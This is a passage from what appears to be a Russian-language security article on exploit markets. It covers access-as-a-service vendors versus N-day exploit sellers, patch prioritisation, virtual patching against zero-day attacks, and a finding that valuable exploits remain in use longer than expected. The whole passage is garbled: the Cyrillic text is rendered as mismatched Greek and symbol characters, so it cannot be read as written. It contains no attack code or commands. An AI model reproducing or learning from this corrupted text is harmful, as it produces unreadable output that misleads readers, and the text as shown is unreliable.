ΠΊΠ»ΠΈΠ΅Π½Ρ‚Π°ΠΌ Ρ‚Π°ΠΊΠΈΠ΅ прСимущСства, ΠΊΠ°ΠΊ простота использования ΠΈ ΠΏΡ€ΠΎΠ·Ρ€Π°Ρ‡Π½ΠΎΡΡ‚ΡŒ, Π° поставщикам β€” Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ Ρ‚Ρ€Π΅Π±ΠΎΠ²Π°Ρ‚ΡŒ Π·Π° Π»ΡƒΡ‡ΡˆΠΈΠΉ сСрвис Π±ΠΎΠ»Π΅Π΅ высокиС Ρ†Π΅Π½Ρ‹, Ρ‡Π΅ΠΌ Π·Π° эксплойты N-day. Помимо этого, поставщики доступа ΠΊΠ°ΠΊ услуги Π½Π΅ ΠΏΠΎΠ΄Π²Π΅Ρ€Π³Π°ΡŽΡ‚ΡΡ Ρ‚Π°ΠΊΠΈΠΌ ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΠ°ΠΌ со стороны ΠΏΠΎΡ‚Π΅Π½Ρ†ΠΈΠ°Π»ΡŒΠ½Ρ‹Ρ… ΠΏΠΎΠΊΡƒΠΏΠ°Ρ‚Π΅Π»Π΅ΠΉ, ΠΊΠ°ΠΊ ΠΏΡ€ΠΎΠ΄Π°Π²Ρ†Ρ‹ эксплойтов.

ΠŸΡ€ΠΈΠΌΠ΅Π½Π΅Π½ΠΈΠ΅ всСх доступных исправлСний для уязвимостСй ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ практичСски Π½Π΅Π²Ρ‹ΠΏΠΎΠ»Π½ΠΈΠΌΠΎΠΉ Π·Π°Π΄Π°Ρ‡Π΅ΠΉ для любой ΠΎΡ€Π³Π°Π½ΠΈΠ·Π°Ρ†ΠΈΠΈ. Π”Ρ€ΡƒΠ³ΠΈΠΌΠΈ словами, Π΄ΠΎΠ±ΠΈΡ‚ΡŒΡΡ ΠΏΠΎΠ»Π½ΠΎΠΉ нСуязвимости систСм Π½Π΅Ρ€Π΅Π°Π»ΡŒΠ½ΠΎ. Π’Π΅ΠΌ Π½Π΅ ΠΌΠ΅Π½Π΅Π΅, опрСдСляя ΠΏΡ€ΠΈΠΎΡ€ΠΈΡ‚Π΅Ρ‚Π½ΠΎΡΡ‚ΡŒ установки ΠΏΠ°Ρ‚Ρ‡Π΅ΠΉ, компаниям слСдуСт ΡƒΡ‡ΠΈΡ‚Ρ‹Π²Π°Ρ‚ΡŒ эксплойты, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ смогут ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ кибСрпрСступники.

Один ΠΈΠ· способов Π²Ρ‹ΠΈΠ³Ρ€Π°Ρ‚ΡŒ врСмя, Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌΠΎΠ΅ ΠΊΠΎΠΌΠ°Π½Π΄Π°ΠΌ бСзопасности для развёртывания Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌΡ‹Ρ… ΠΎΠ±Π½ΠΎΠ²Π»Π΅Π½ΠΈΠΉ, β€” Π²ΠΈΡ€Ρ‚ΡƒΠ°Π»ΡŒΠ½Ρ‹Π΅ ΠΏΠ°Ρ‚Ρ‡ΠΈ. Π­Ρ‚ΠΎΡ‚ инструмСнт особСнно Π²Π°ΠΆΠ΅Π½, ΠΊΠΎΠ³Π΄Π° Ρ€Π΅Ρ‡ΡŒ ΠΈΠ΄Ρ‘Ρ‚ ΠΎΠ± уязвимостях Π½ΡƒΠ»Π΅Π²ΠΎΠ³ΠΎ дня, ΠΏΠΎΡΠΊΠΎΠ»ΡŒΠΊΡƒ Π²ΠΈΡ€Ρ‚ΡƒΠ°Π»ΡŒΠ½Ρ‹Π΅ ΠΏΠ°Ρ‚Ρ‡ΠΈ Π·Π°Ρ‰ΠΈΡ‰Π°ΡŽΡ‚ систСмы ΠΈ сСти, выступая Π² качСствС Π΄ΠΎΠΏΠΎΠ»Π½ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎΠ³ΠΎ слоя бСзопасности ΠΎΡ‚ извСстных ΠΈ нСизвСстных эксплойтов.

Один ΠΈΠ· Π²Π°ΠΆΠ½Π΅ΠΉΡˆΠΈΡ… Π²Ρ‹Π²ΠΎΠ΄ΠΎΠ² нашСго исслСдования состоит Π² Ρ‚ΠΎΠΌ, Ρ‡Ρ‚ΠΎ срок ΠΆΠΈΠ·Π½ΠΈ Ρ†Π΅Π½Π½ΠΎΠ³ΠΎ эксплойта Π·Π½Π°Ρ‡ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ дольшС, Ρ‡Π΅ΠΌ ΠΌΠ½ΠΎΠ³ΠΈΠ΅ ΠΎΠΆΠΈΠ΄Π°ΡŽΡ‚. Π­Ρ‚ΠΎ Ρ‡Ρ€Π΅Π·Π²Ρ‹Ρ‡Π°ΠΉΠ½ΠΎ ваТная информация для всСх, ΠΊΡ‚ΠΎ занимаСтся установкой исправлСний, ΠΏΠΎΡΠΊΠΎΠ»ΡŒΠΊΡƒ устранСниС популярной «старой» уязвимости Π·Π°Ρ‡Π°ΡΡ‚ΡƒΡŽ ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ ΠΏΡ€ΠΈΠΎΡ€ΠΈΡ‚Π΅Ρ‚Π½Π΅Π΅, Ρ‡Π΅ΠΌ устранСниС сСгодняшнСй критичСской уязвимости.

Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ

Π”ΠΎΠ±Π°Π²ΠΈΡ‚ΡŒ ΠΊΠΎΠΌΠΌΠ΅Π½Ρ‚Π°Ρ€ΠΈΠΉ

Π’Π°Ρˆ адрСс email Π½Π΅ Π±ΡƒΠ΄Π΅Ρ‚ ΠΎΠΏΡƒΠ±Π»ΠΈΠΊΠΎΠ²Π°Π½. ΠžΠ±ΡΠ·Π°Ρ‚Π΅Π»ΡŒΠ½Ρ‹Π΅ поля ΠΏΠΎΠΌΠ΅Ρ‡Π΅Π½Ρ‹ *